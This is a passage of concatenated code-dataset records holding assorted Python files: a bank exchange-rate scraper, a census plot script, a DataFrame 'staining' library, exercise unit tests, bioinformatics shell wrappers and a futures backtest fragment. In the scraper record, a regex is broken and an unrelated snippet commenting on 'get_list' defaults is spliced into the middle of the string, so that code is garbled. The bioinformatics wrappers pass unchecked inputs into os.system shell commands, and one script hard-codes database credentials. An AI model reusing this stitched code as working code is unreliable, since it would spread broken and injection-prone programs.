pageSize)\n\n","sub_path":"apps/performance/api/services/TMPER_TargetKPIDetailService.py","file_name":"TMPER_TargetKPIDetailService.py","file_ext":"py","file_size_in_byte":1787,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"173730717","text":"\r\nfrom . import base_searcher\r\nfrom models import CurrencyRate\r\nimport json\r\nimport http.client\r\nimport requests\r\nimport re\r\nfrom datetime import datetime\r\nfrom bs4 import BeautifulSoup\r\nimport time\r\n\r\n\r\ndef getCleanStr(value):\r\n return value.strip()\r\ndef getDateTime(value):\r\n s=[int(x) for x in value.replace(\"年\",\"-\").replace(\"月\",\"-\").replace(\"日\",\"\").split(\"-\")]\r\n return datetime(s[0],s[1],s[2])\r\nclass CMBPriceSearcher(base_searcher.BaseSearcher):\r\n curencyDic={\r\n \"美元\":\"USD\",\r\n \"日元\":\"JPY\",\r\n \"欧元\":\"EUR\",\r\n \"港币\":\"HKD\",\r\n \"新加坡元\":\"SGD\",\r\n \"澳大利亚元\":\"AUD\",\r\n \"英镑\":\"GBP\",\r\n \"加拿大元\":\"CAD\",\r\n \"瑞士法郎\":\"CHF\",\r\n \"新西兰元\":\"NZD\"\r\n }\r\n\r\n \r\n def getData(self):\r\n r=requests.get(\"http://fx.cmbchina.com/hq/\")\r\n r=re.search('[\\s]{1}[\\s\\S]*
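# In get_list above the literal defaults look swapped (pageSize defaults to 0 and
# pageIndex to 20), and the lambda fallbacks that follow only replace explicit
# None values, not those substituted defaults. A sketch of the straightforward
# version without the lambdas:
def read_paging(data):
    page_index = data.get('pageIndex') or 0
    page_size = data.get('pageSize') or 20
    search = (data.get('search') or '').strip()
    return page_index, page_size, search

print(read_paging({'search': ' usd ', 'pageIndex': None}))  # (0, 20, 'usd')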
[\\s]{1}',r.text)\r\n        soup=BeautifulSoup(r.group(),'html5lib')\r\n        data_list=[]\r\n        for idx,tr in enumerate(soup.find_all(\"tr\")):\r\n            if idx!=0:\r\n                tds=tr.find_all(\"td\")\r\n                data_list.append(CurrencyRate(\r\n                    \"CMB\",\r\n                    CMBPriceSearcher.curencyDic[getCleanStr(tds[0].contents[0])],\r\n                    getCleanStr(tds[4].contents[0]),\r\n                    getCleanStr(tds[6].contents[0])))\r\n        return data_list\r\n    \r\n    def getHistoryData(self,currencyCHNName):\r\n        historyUrl=\"http://fx.cmbchina.com/Hq/History.aspx?&nbr=%s&page=\" % currencyCHNName\r\n        data_list=[]\r\n        for pageID in range(1,20):\r\n            r=requests.get(historyUrl+str(pageID))\r\n            r=re.search('[\\s]+[\\s\\S]*[\\s]+',r.text)\r\n            soup=BeautifulSoup(\"<table>\"+r.group()+\"</table>
\",'html5lib')\r\n \r\n for tr in soup.find_all(\"tr\"):\r\n tds=tr.find_all(\"td\")\r\n data=CurrencyRate(\r\n \"CMB\",\r\n CMBPriceSearcher.curencyDic[currencyCHNName],\r\n getCleanStr(tds[4].contents[0]),\r\n getCleanStr(tds[2].contents[0]),\r\n getDateTime(getCleanStr(tds[0].contents[0])))\r\n print(str(data))\r\n data_list.append(data) \r\n return data_list\r\n\r\n def getAllHistoryData(self):\r\n data_list=[]\r\n for key in CMBPriceSearcher.curencyDic.keys():\r\n data_list.extend(self.getHistoryData(key))\r\n \r\n return data_list\r\n \r\n\r\n\r\n","sub_path":"getcurrencyrate/searcher/cmb_searcher.py","file_name":"cmb_searcher.py","file_ext":"py","file_size_in_byte":2927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"318564433","text":"'''/////////////////////////////////////////////////////////////////\nHEADER:\n#DEPENDENCIES\n\tPopulation_poa\n\tsys\n\tmatplotlib.pyplot\n\n#FUNCTION AND DESCRIPTION\n\tthis is a simple function that fethes the population and age of \n\tpostcodes and then plots it as a function of postcode address. \n\tthis does not take distance or population density into account\n////////////////////////////////////////////////////////////////////\n#AUTHOR: RYAN MAY\n#STUDENT ID: 19477774\n#PUBLISHED: 26/05/2018\n#CURTIN UNIVERISTY COMP1001 COURSE\n////////////////////////////////////////////////////////////////////\nFILES: \n\t../Shared_Python_moldules/Population_poa.py \n\t../Processing_Data/2016_Census_POA.csv\t\t\t\t\t\n\t../Processing_Data/postcodes.csv\t\t\t\t\t\t\nOUTPUT FILES:\t\n\tGraphs/POPULATION_R_POA.png \t\t\t\t\t\t\t\n/////////////////////////////////////////////////////////////////'''\n\nimport sys\nsys.path.insert(0, '../Shared_Python_modules/')\nfrom Population_poa import POPOFPOA \nimport matplotlib.pyplot as plt\n\nCENSUS_DATA_DIR = \"../Processing_Data/2016_Census_POA.csv\"\n\nx = POPOFPOA(CENSUS_DATA_DIR)\nPOPULATION = x.processing()\n\nPOSTCODE_FILE = open('../Processing_Data/postcodes.csv','r')\nPOSTCODE = (POSTCODE_FILE.read()).split('\\n')[:-1:]\n\nplt.style.use('ggplot')\nplt.plot(POSTCODE, POPULATION)\nplt.title(\"POPULATION PER POSTCODE\")\nplt.xlabel(\"POSTODE OF RESIDENCY\")\nplt.ylabel(\"POPULATION OF POSTCODE\")\nplt.savefig(\"Graphs/POPULATION_R_POA.png\")\nplt.show()\n\n","sub_path":"Hypothesis1/GRAPH_Populaion_R_Postcode.py","file_name":"GRAPH_Populaion_R_Postcode.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"374240910","text":"import pandas as pd\nfrom pandas.api.types import is_numeric_dtype, is_datetime64_any_dtype, is_categorical_dtype\nfrom numpy.random import default_rng\nfrom time import time\nfrom functools import reduce\nfrom warnings import warn\nfrom .stainer import Stainer\nfrom .history import *\n\nclass DirtyDF:\n \"\"\"\n Dirty DataFrame. Stores information about the dataframe to be stained, previous staining results, \n and the mapping of the rows and columns.\n \n To be used in conjunction with Stainer class to add and execute stainers.\n \"\"\"\n def __init__(self, df, seed = None, copy = False):\n \"\"\" \n Constructor for DirtyDF\n \n Parameters\n ----------\n df : pd.DataFrame \n Dataframe to be transformed.\n seed : int, optional\n Controls the randomness of the staining process. For a\n deterministic behaviour, seed has to be fixed to an integer. If unspecified, will choose a random seed\n copy : boolean, optional\n Not for use by user. 
Determines if a copy of DirtyDF is being\n            created. If True, will copy the details from the previous DDF.\n        \"\"\"\n        self.df = df\n        \n        if not copy:\n            if not seed:\n                self.seed = int(time() * 100 % (2**32 - 1))\n            else:\n                self.seed = seed\n            \n            self.rng = default_rng(self.seed)\n            self.orig_shape = df.shape\n            self.stainers = []\n            self.row_map = {i: [i] for i in range(df.shape[0])} \n            self.col_map = {i: [i] for i in range(df.shape[1])} \n            self.history = [] \n        \n        self.cat_cols = [i for i in range(df.shape[1]) if is_categorical_dtype(df.iloc[:, i])]\n        self.num_cols = [i for i in range(df.shape[1]) if is_numeric_dtype(df.iloc[:, i])]\n        self.dt_cols = [i for i in range(df.shape[1]) if is_datetime64_any_dtype(df.iloc[:, i])]\n    \n    def get_df(self):\n        \"\"\" Returns the dataframe \n        \n        Returns\n        ----------\n        df : pd.DataFrame\n            Current dataframe in DDF\n        \"\"\"\n        return self.df\n    \n    def get_seed(self):\n        \"\"\" Returns seed number \n        \n        Returns\n        ----------\n        seed : int\n            Integer seed used to create Generator for randomisation \n        \"\"\"\n        return self.seed\n    \n    def get_rng(self):\n        \"\"\" Returns seed generator\n        \n        Returns\n        ----------\n        rng : np.random.BitGenerator\n            PCG64 pseudo-random number generator used for randomisation\n        \"\"\"\n        return self.rng\n\n    def get_mapping(self, axis = 0):\n        \"\"\" Mapping of rows/cols from original dataframe to most recent dataframe. \n        A dictionary is returned with information on which index the original\n        rows/cols are displayed in the newest dataframe. \n        For instance, if row 3 got shuffled to row 8 in the new dataframe, then\n        row 8 got shuffled to row 2, the function will return {3: [2]}\n        \n        Parameters\n        ----------\n        axis : (0/1), optional\n            If 0, returns the row mapping.\n            If 1, returns the col mapping.\n            \n            Defaults to 0\n        \n        Returns\n        ----------\n        map : {int : int list} dictionary \n            Mapping of original row/col indices to current dataframe's row/col indices.\n        \n        Raises\n        ----------\n        Exception\n            If axis provided is not 0/1\n        \"\"\"\n        if axis in (0, \"row\"):\n            return self.row_map\n        if axis in (1, \"column\"):\n            return self.col_map\n        raise Exception(\"Invalid axis parameter\")\n\n    def get_map_from_history(self, index, axis = 0):\n        \"\"\" Mapping of rows/cols of the specified stainer transformation that had been executed.\n        A dictionary is returned with information on what row/col index right\n        before the specified transformation has converted to after the\n        transformation. \n        For instance, if row 3 got shuffled to row 8 in the new dataframe, then\n        row 8 got shuffled to row 2, calling index=0 will return {3: [8]} \n        and calling index=1 will return {8: [2]}\n        \n        Parameters\n        ----------\n        index : int\n            Index of stainer sequence to query mapping. E.g. 
index=1 will query\n the mapping performed by the 2nd stainer operation.\n axis : (0/1), optional\n If 0, returns the row mapping.\n If 1, returns the col mapping.\n \n Defaults to 0\n \n Returns\n ----------\n map : {int : int list} dictionary \n Mapping of original row/col indices to current dataframe's row/col indices.\n \n Raises\n ----------\n Exception\n If axis provided is not 0/1\n \"\"\"\n if axis in (0, \"row\"):\n return self.history[index].get_row_map()\n if axis in (1, \"col\"):\n return self.history[index].get_col_map()\n raise Exception(\"Invalid axis parameter\")\n \n def get_previous_map(self, axis = 0):\n \"\"\" Mapping of rows/cols of the most recent stainer transformation that had been executed.\n A dictionary is returned with information on what row/col index right\n before the transformation has converted to after the transformation. \n For instance, if row 3 got shuffled to row 8 in the new dataframe, then\n row 8 got shuffled to row 2, the function will return {8: [2]}\n \n Parameters\n ----------\n axis : (0/1), optional\n If 0, returns the row mapping.\n If 1, returns the col mapping.\n \n Defaults to 0\n \n Returns\n ----------\n map : {int : int list} dictionary \n Mapping of original row/col indices to current dataframe's row/col indices.\n \n Raises\n ----------\n Exception\n If axis provided is not 0/1\n \"\"\"\n return self.get_map_from_history(-1, axis)\n\n def reset_rng(self):\n \"\"\" Resets Random Generator object \"\"\"\n self.rng = default_rng(self.seed)\n \n # Print methods\n def summarise_stainers(self):\n \"\"\" Prints names of stainers that have yet to be executed \"\"\"\n for i, stainer in enumerate(self.stainers):\n print(f\"{i+1}. {stainer[0].name}\")\n\n def print_history(self):\n \"\"\" Print historical details of the stainers that have been executed \"\"\"\n tuple(map(lambda x: print(self.history.index(x) + 1, x, sep = \". \"), self.history))\n \n def __add_history__(self, data, row_map, col_map):\n \"\"\" Not to be explicitly called by user. Used in conjunction while running stainer to create and add History object to DDF information.\n \n Parameters\n ----------\n data : (str, str, float) tuple\n (name of stainer, message, time taken). Contains data to be used to create the History object\n row_map: {int: int} dictionary \n Row mapping showing the relationship between the original and new\n row positions. Only applies to transformation for the specific\n stainer.\n col_map: {int: int} dictionary\n Column mapping showing the relationship between the original and\n new column positions. Only applies to transformation for the\n specific stainer.\n \"\"\"\n self.history.append(History(data, row_map, col_map))\n \n def add_stainers(self, stain, use_orig_row = True, use_orig_col = True):\n \"\"\" Adds a stainer / list of stainers to current list of stainers to be executed.\n \n Parameters\n ----------\n stain : Stainer or Stainer list \n stainers to be added to the DDF to be executed in the future\n use_orig_row : boolean, optional\n Indicates if indices in stainer refers to the initial dataframe, or\n the index of the dataframe at time of execution.\n If True, indices from initial dataframe are used. Defaults to True\n use_orig_col : boolean, optional\n Indicates if indices in stainer refers to the initial dataframe, or\n the index of the dataframe at time of execution.\n If True, indices from initial dataframe are used. 
Defaults to True\n \n Returns\n ----------\n ddf : DirtyDF\n Returns new copy of DDF with the stainer added\n \"\"\"\n ddf = self.copy()\n if isinstance(stain, Stainer):\n ddf.stainers.append((stain, use_orig_row, use_orig_col))\n else:\n for st in stain:\n ddf.stainers.append((st, use_orig_row, use_orig_col))\n \n return ddf\n \n def reindex_stainers(self, new_order):\n \"\"\"\n Reorder stainers in a specified order \n \n Parameters\n ----------\n new_order : int list\n Indices of the new order of stainers. If original was [A, B, C] and\n new_order = [1, 2, 0], the resulting order will be [C, A, B].\n \n Returns\n ----------\n ddf : DirtyDF\n Returns new copy of DDF with the stainers rearranged\n \"\"\"\n ddf = self.copy()\n ddf.stainers = list(map(lambda x: ddf.stainers[x], new_order))\n \n return ddf\n \n def shuffle_stainers(self):\n \"\"\"\n Randomly reorder the stainers\n \n Returns\n ----------\n ddf : DirtyDF\n Returns new copy of DDF with the stainers rearranged\n \"\"\"\n n = len(self.stainers)\n new_order = self.rng.choice([i for i in range(n)], size = n, replace = False)\n return self.reindex_stainers(new_order)\n \n def run_stainer(self, idx = 0):\n \"\"\"\n Applies the transformation of the specified stainer\n \n Parameters\n ----------\n idx : int, optional\n Index of stainer to execute. Defaults to 0 (first stainer added)\n \n Returns\n ----------\n ddf : DirtyDF\n Returns new DDF after the specified stainer has been executed\n \"\"\"\n ddf = self.copy()\n stainer, use_orig_row, use_orig_col = ddf.stainers.pop(idx)\n \n row, col = stainer.get_indices()\n \n n_row, n_col = self.orig_shape\n \n default_given = False\n if not row:\n row = [i for i in range(n_row)]\n if not col:\n col = [i for i in range(n_col)]\n default_given = True\n \n if use_orig_row:\n final_row = []\n for ele in row:\n final_row.extend(self.row_map[ele])\n row = final_row\n\n if use_orig_col:\n final_col = []\n for ele in col:\n final_col.extend(self.col_map[ele])\n col = final_col\n \n col_type = stainer.get_col_type()\n if col_type == \"all\":\n col = col\n elif col_type not in (\"category\", \"cat\", \n \"datetime\", \"date\", \"time\", \n \"numeric\", \"int\", \"float\"):\n warn(f\"Invalid Stainer Column type for {stainer.name}. Using all columns instead\")\n else:\n input_cols = set(col)\n if col_type in (\"category\", \"cat\"):\n relevant_cols = set(ddf.cat_cols)\n if col_type in (\"datetime\", \"date\", \"time\"):\n relevant_cols = set(ddf.dt_cols)\n if col_type in (\"numeric\", \"int\", \"float\"):\n relevant_cols = set(ddf.num_cols)\n if not default_given and not input_cols.issubset(relevant_cols):\n raise TypeError(f\"Column with incorrect column type provided to stainer {stainer.name}, which requires column type {col_type}.\")\n else:\n col = list(input_cols & relevant_cols)\n \n res = stainer.transform(self.df, self.rng, row, col)\n \n try:\n new_df, row_map, col_map = res\n except:\n raise Exception(\"Need to enter a row_map and col_map. 
If no rows or columns were added/deleted, enter an empty list\")\n\n # Default options\n if not len(row_map):\n row_map = {i: [i] for i in range(new_df.shape[0])} \n if not len(col_map):\n col_map = {i: [i] for i in range(new_df.shape[1])} \n \n def new_mapping(original, new):\n \"\"\"\n Given an old mapping and a one-step mapping, returns a mapping that connects the most\n original one to the final mapping \n \"\"\"\n final_map = {}\n for k, v in original.items():\n final_map[k] = []\n for element in v:\n final_map[k].extend(new[element])\n \"\"\"\n final_map = np.zeros((len(original), len(new[0])))\n for i in range(len(original)):\n initial_map = np.nonzero(original[i])[0]\n new_idx = reduce(lambda x, y: np.concatenate([x,y]).reshape(-1),\n map(lambda x: np.nonzero(new[x])[0], initial_map))\n if len(new_idx):\n final_map[i][new_idx] = 1\n return final_map\n \"\"\"\n return final_map\n\n\n ddf.row_map = new_mapping(self.row_map, row_map)\n ddf.col_map = new_mapping(self.col_map, col_map)\n \n ddf.__add_history__(stainer.get_history(), row_map, col_map) # This stores the -1 mapping\n ddf.df = new_df\n return ddf\n \n def run_all_stainers(self): \n \"\"\"\n Applies the transformation of all stainers in order\n \n Returns\n ----------\n ddf : DirtyDF\n Returns new DDF after all the stainers have been executed\n \"\"\"\n current_ddf = self\n for stainer in self.stainers:\n current_ddf = current_ddf.run_stainer()\n return current_ddf\n\n def copy(self):\n \"\"\"\n Creates a copy of the DDF\n \n Returns\n ----------\n ddf : DirtyDF\n Returns copy of DDF\n \"\"\"\n new_ddf = DirtyDF(self.df.copy(), copy = True)\n new_ddf.seed = self.seed\n new_ddf.rng = self.rng\n new_ddf.orig_shape = self.orig_shape\n new_ddf.stainers = self.stainers.copy()\n new_ddf.history = self.history.copy()\n new_ddf.row_map = self.row_map.copy()\n new_ddf.col_map = self.col_map.copy()\n return new_ddf\n","sub_path":"ddf/ddf/DirtyDF.py","file_name":"DirtyDF.py","file_ext":"py","file_size_in_byte":14626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"315334665","text":"import csv\n\n\nwith open('od.csv', \"r\") as f:\n reader = list(csv.reader(f))\n od = []\n for i in range(len(reader)-1):\n for j in range(len(reader[i+1])-1):\n odi2j = [int(reader[0][j+1]), int(reader[i+1][0]), int(reader[i+1][j+1])]\n od.append(odi2j)\n\ncsvFile=open(\"test.csv\",'w',newline='')\ntry:\n writer=csv.writer(csvFile)\n for i in range(len(od)):\n writer.writerow(od[i])\nfinally:\n csvFile.close()\n\n","sub_path":"地铁2/od_csv.py","file_name":"od_csv.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"521877318","text":"import unittest\nfrom unittest.mock import patch\n\nfrom tmc import points\nfrom tmc.utils import load, load_module, reload_module, get_stdout, check_source\nimport os\nimport textwrap\n\nexercise = 'src.poista_isot'\nfunction = 'poista_isot'\n\ndef get_correct(test_case: list) -> list:\n return [x for x in test_case if not x.isupper()]\n\n@points('4.poista_isot')\nclass PoistaIsotTest(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n with patch('builtins.input', side_effect=[AssertionError(\"Syötteen pyytämistä ei odotettu\")]):\n cls.module = load_module(exercise, 'fi')\n\n def test_0_paaohjelma_kunnossa(self):\n ok, line = check_source(self.module)\n message = \"\"\"Funktioita testaava koodi tulee sijoittaa lohkon\nif __name__ == \"__main__\":\nsisälle. 
Seuraava rivi tulee siirtää:\n\"\"\"\n self.assertTrue(ok, message+line)\n\n def test_1_funktio_olemassa(self):\n try:\n from src.poista_isot import poista_isot\n except:\n self.assertTrue(False, 'Koodistasi pitäisi löytyä funktio nimeltä poista_isot(lista: list)')\n try:\n from src.poista_isot import poista_isot\n poista_isot([\"Abc\"])\n except:\n self.assertTrue(False, 'Varmista että seuraava funktiokutsu onnistuupoista_isot([\"Abc\"])')\n\n def test_2_ei_paluuarvo(self):\n poista_isot = load(exercise, function, 'fi')\n val = poista_isot([\"Abc\"])\n self.assertTrue(type(val) == list, f'Funktio {function} ei palauta listaa kun sitä kutsutaan \\npoista_isot([\"Abc\"])')\n \n def test_3_poistettavat_ei_perakkain(self):\n for test_case in [[\"EKA\", \"toka\", \"KOLMAS\", \"neljäs\"], [\"aaaa\", \"BBBB\", \"cccc\", \"dddd\", \"EEEE\", \"ffff\", \"GGGG\"]]:\n with patch('builtins.input', side_effect=[AssertionError(\"Syötteen pyytämistä ei odotettu\")]):\n reload_module(self.module)\n output_alussa = get_stdout()\n poista_isot = load(exercise, function, 'fi')\n \n correct = get_correct(test_case)\n test_case_original = test_case[:]\n vastaus = poista_isot(test_case)\n\n self.assertTrue(correct == vastaus, f\"Paluuarvo\\n{vastaus}\\nei vastaa odotettua\\n{correct}\\nkutsuttaessa poista_isot({test_case_original})\")\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"osa04-24_poista_isot/test/test_poista_isot.py","file_name":"test_poista_isot.py","file_ext":"py","file_size_in_byte":2374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"320141921","text":"import pymysql\nimport pandas as pd\n\ndb = pymysql.connect(\"192.168.103.31\", \"root\", \"adminadmin\", \"downloads\")\n\npath = r'C:\\Users\\Administrator.DESKTOP-DV7S27B\\Desktop\\需要维护的数据\\下载量\\下载量二级类和对应的种类.xlsx'\ndata_excel = pd.read_excel(path)\nprint(data_excel)\nlv2 = data_excel['二级类']\ncategory = data_excel['种类']\ncategory_dict = dict(zip(lv2, category))\nprint(category_dict)\ncursor = db.cursor()\nfor lv2, category in category_dict.items():\n # print(result)\n sql = \"\"\"UPDATE ANDROID_SAFE_APP SET category = '%s' WHERE category_lv2 = '%s'\"\"\" % (category, lv2)\n print(sql)\n # cursor.execute(sql)\n # 提交到数据库执行\n db.commit()\nprint(category_dict)\n{'便捷生活': '便捷生活', '购物': '购物', '购物优惠': '购物', '视频': '视频', '影音视听': '视频', '理财': '理财', '金融理财': '理财', '社交': '社交', '通讯': '社交',\n '通讯社交': '社交', '运动健康': '运动健康', '旅游酒店': '旅游酒店', '教育学习': '教育学习', '音乐': '音乐', '实用工具': '工具', '微应用': '工具', '常用工具': '工具',\n '软件': '工具', '系统': '系统', '系统安全': '系统', '手机美化': '系统', '主题壁纸': '系统', '摄影': '摄影', '摄影摄像': '摄影', '出行': '出行', '交通导航': '出行',\n '阅读': '阅读', '新闻阅读': '阅读', '育儿母婴': '育儿母婴', '办公商务': '办公商务', '生活服务': '生活服务'}\n","sub_path":"IDGdemo/Downloads/mysql/360sql语句/2.根据Lv2确定category.py","file_name":"2.根据Lv2确定category.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"152588161","text":"#!/usr/bin/python3\n#\t\t\t\tSynopsis:\n#A collection of all the functions in the different scripts\nimport os, shutil, subprocess\n\n#Function from script 3. 
Efetches using input\ndef downloadseq (query,web_env):\n\timport os, shutil, subprocess\n\t#Creates two strings, using the input for query and webenv, to make a system call to run the bash wget command\n\tfasta_call = \"wget -O proteinseq.fasta \\\"https://eutils.ncbi.nlm.nih.gov/entrez/eutils/efetch.fcgi?db=protein&query_key=\"+query+\"&WebEnv=\"+web_env+\"&rettype=fasta&retmode=text\\\"\"\n\tprint (fasta_call)\n\tgenbank_call = \"wget -O proteinseq_genbank.gb \\\"https://eutils.ncbi.nlm.nih.gov/entrez/eutils/efetch.fcgi?db=protein&query_key=\"+query+\"&WebEnv=\"+web_env+\"&rettype=gb&retmode=text\\\"\"\n\tos.system(fasta_call)\n\tos.system(genbank_call)\n\tprint (\"\\n\\nThe protein sequences were downloaded! Two versions of the files exist, one in fasta format, the other in genbank format. The files can be found under output_data/proteinseq.fasta and output_data/proteinseq_genbank.gb respectively\")\n\tshutil.copy(\"proteinseq.fasta\", \"output_data/proteinseq.fasta\")\n\tshutil.copy(\"proteinseq_genbank.gb\", \"output_data/proteinseq_genbank.gb\")\n\treturn fasta_call,genbank_call\n\n#Functions from script 5:\n#Generates a blast db using input\ndef databasemaker (fastafile):\n\tprint (\"generating database for the protein sequences. Please wait...\")\n\n\t#This generates a string that allows a system call to run makeblastdb\n\tsystem_call = \"makeblastdb -in \"+fastafile+\" -input_type fasta -dbtype prot -parse_seqids -out sequencedb \"\n\tos.system (system_call)\n\t#os.system (\"makeblastdb -in proteinseq.fasta -input_type fasta -dbtype prot -parse_seqids -out sequencedb \")\n\treturn system_call\n\n#Aligns fasta files using input\ndef aligner (fastafile):\n\timport os, shutil, subprocess\n\tprint (\"Now aligning downloaded protein sequences. Please wait...\")\n\t#This aligns all the sequences in order of best alignment to worst alignment, based on an algorithm processed by clustalo \n\tsystem_call = \"clustalo -i \"+fastafile+\" -o seq_alignment_clustalo.msf --output-order tree-order --force -v\"\n\tos.system (system_call)\n\talignment=open(\"seq_alignment_clustalo.msf\").read()\n\tprint (\"The clustal omega alignment was completed. It can be found under output_data/seq_alignment_clustalo.msf\")\n\treturn system_call\n\n#Feeds a file into the plotcon command and runs it with an os.system call. Returns to the user interface at the end\ndef plotconthis (alignment,subtitle):\n\timport os, shutil, subprocess\n\tprint (\"Now plotting the conservation of sequences across the protein alignment...\")\n\t#search_info=open(\"search.txt\").read()\n\tplot=\"plotcon -sequences \"+alignment+\" -winsize 12 -graph x11 -scorefile EBLOSUM62 -gsubtitle \\\"\"+subtitle+\"\\\" > conservation_plot.png\"\n\tos.system (str(plot))\n\tprint (\"The plot can be found under output_data/conservation_plot.png.\\n Press enter to continue...\")\n\tcontinuing = input(\"\")\n\tos.chdir(\"..\")\n\tos.system (\"pwd\")\n\tos.system (\"python3 0_interface.py\")\n\treturn plot\n\n#Creating an alignment file suitable for publication\n#Feeds an inputfile determined by the user into a command and runs it using an os.system call\ndef showalignthis (inputfile,outfile):\n\timport os, shutil, subprocess\n\t#Creates a string using the input for inputfile and outfile, to make a system call to run a showalign emboss. 
\n\t#This generates a very pretty alignment file that can be used for a publication\n\tshowalign_call = \"showalign -sequence \"+inputfile+\" -outfile \"+outfile\n\tprint (showalign_call)\n\tos.system(showalign_call)\n\tprint (\"\\n\\nAn alignment suitable for publication was generated!\\n It can be found under outputdata/\"+outfile+\" .\")\n\t#copyover = \"output_data/\"+outfile\n\t#shutil.copy(outfile, copyover)\n\treturn showalign_call\n\n#Generating a consensus sequence:\n#Feeds a inputfile determined by the user into a command and runs it using a os system call\ndef consthis (inputfile,outfile):\n\timport os, shutil, subprocess\n\t#Creates two strings, using the input for inputfile and outfile, to make a system call to run a con emboss, generating a consensus sequence for a set of aligned sequences \n\tcons_call = \"cons -sequence \"+inputfile+\" -outseq \"+outfile\n\tprint (cons_call)\n\tos.system(cons_call)\n\tprint (\"\\n\\nA consensus sequence for your alignment file was generated!\\n It can be found under outputdata/\"+outfile+\" .\")\n\treturn cons_call\n\n","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":4406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"257839948","text":"from numba import njit\n\nfrom tardis.montecarlo.montecarlo_numba import (\n njit_dict_no_parallel,\n)\n\nfrom tardis.montecarlo.montecarlo_numba.frame_transformations import (\n calc_packet_energy,\n calc_packet_energy_full_relativity,\n)\n\nfrom tardis.montecarlo.montecarlo_numba.numba_config import (\n ENABLE_FULL_RELATIVITY,\n)\n\n\n@njit(**njit_dict_no_parallel)\ndef set_estimators(r_packet, distance, numba_estimator, comov_nu, comov_energy):\n \"\"\"\n Updating the estimators\n \"\"\"\n numba_estimator.j_estimator[r_packet.current_shell_id] += (\n comov_energy * distance\n )\n numba_estimator.nu_bar_estimator[r_packet.current_shell_id] += (\n comov_energy * distance * comov_nu\n )\n\n\n@njit(**njit_dict_no_parallel)\ndef set_estimators_full_relativity(\n r_packet, distance, numba_estimator, comov_nu, comov_energy, doppler_factor\n):\n numba_estimator.j_estimator[r_packet.current_shell_id] += (\n comov_energy * distance * doppler_factor\n )\n numba_estimator.nu_bar_estimator[r_packet.current_shell_id] += (\n comov_energy * distance * comov_nu * doppler_factor\n )\n\n\n@njit(**njit_dict_no_parallel)\ndef update_line_estimators(\n estimators, r_packet, cur_line_id, distance_trace, time_explosion\n):\n \"\"\"\n Function to update the line estimators\n\n Parameters\n ----------\n estimators : tardis.montecarlo.montecarlo_numba.numba_interface.Estimators\n r_packet : tardis.montecarlo.montecarlo_numba.r_packet.RPacket\n cur_line_id : int\n distance_trace : float\n time_explosion : float\n \"\"\"\n\n \"\"\" Actual calculation - simplified below\n r_interaction = math.sqrt(r_packet.r**2 + distance_trace**2 +\n 2 * r_packet.r * distance_trace * r_packet.mu)\n mu_interaction = (r_packet.mu * r_packet.r + distance_trace) / r_interaction\n doppler_factor = 1.0 - mu_interaction * r_interaction /\n ( time_explosion * C)\n \"\"\"\n\n if not ENABLE_FULL_RELATIVITY:\n energy = calc_packet_energy(r_packet, distance_trace, time_explosion)\n else:\n energy = calc_packet_energy_full_relativity(r_packet)\n\n estimators.j_blue_estimator[cur_line_id, r_packet.current_shell_id] += (\n energy / r_packet.nu\n )\n estimators.Edotlu_estimator[\n cur_line_id, r_packet.current_shell_id\n ] += 
energy\n","sub_path":"tardis/montecarlo/montecarlo_numba/estimators.py","file_name":"estimators.py","file_ext":"py","file_size_in_byte":2321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"270271385","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 7 11:32:22 2017\n@author: lbrein\n --- 与tick 配套对比计算的 kline\n > 1m的 K线 模拟tick预测\n > 定期执行,用于筛选交易对\n\"\"\"\n\nfrom com.base.stat_fun import per, fisher\nfrom com.base.public import public, logger\nimport pandas as pd\nimport talib as ta\nimport numpy as np\nfrom com.object.obj_entity import train_future, train_total, future_baseInfo\nimport os\nfrom com.data.interface_Rice import interface_Rice, tick_csv_Rice\nimport itertools\nimport time\nimport uuid\nfrom multiprocessing import Pool, Manager\nimport statsmodels.api as sm # 协整\nimport copy\n\n\n# 回归方法\nclass train_future_singleExpect0(object):\n \"\"\"\n\n \"\"\"\n iniAmount = 250000 # 单边50万\n csvList = [\n \"SM_30_2.0_5_5_0.025_0.5_0.1_quick_single\",\n \"JM_15_2.0_60_1_0.25_1.0_0.1_quick_single\",\n \"JD_15_2.0_60_5_0.025_0.5_1.25_1_quick_single\",\n \"RB_15_2.0_30_5_0.2_0.5_1.25_1_quick_single\",\n \"AP_15_2.0_15_1_0.2_0.5_0.1_quick_single_13\"\n ]\n\n def __init__(self):\n # 费率和滑点\n self.saveDetail = True # 是否保存明细\n self.isSimTickUse = False # 是否使用1分钟模拟tick测试,否则直接使用kline回测\n self.topUse = False\n self.isEmptyUse = False # 是否清空记录\n #self.codeLists = ['JM', 'SM', 'V', 'I', 'AP', 'J','RB', 'SC', 'MA', 'JD','CU' , 'OI']\n self.codeLists = ['JM', 'SM', 'V', 'I', 'AP', 'J','RB', 'SC', 'MA', 'JD','CU' , 'OI']\n\n self.baseInfo = {}\n\n self.periodList = [15, 30] # 窗体参数\n self.scaleList = [2.0]\n self.shiftScale = 0.527 # 滑点模拟系数\n self.deltaLine = 0.8\n self.processCount = 6\n self.scaleDiffList = [0.2]\n self.scaleDiff2List = [1.0]\n self.scaleDiff2 = 0.5\n\n # k线时间\n # self.klineTypeList = ['5m']\n self.klineTypeList = ['15m', '30m']\n\n self.widthDeltaLineList = [0.025]\n self.widthDeltaLine = 0\n\n self.stopTimeLine = 5\n self.widthTimesPeriodList = [3]\n\n self.testDays = 90\n # 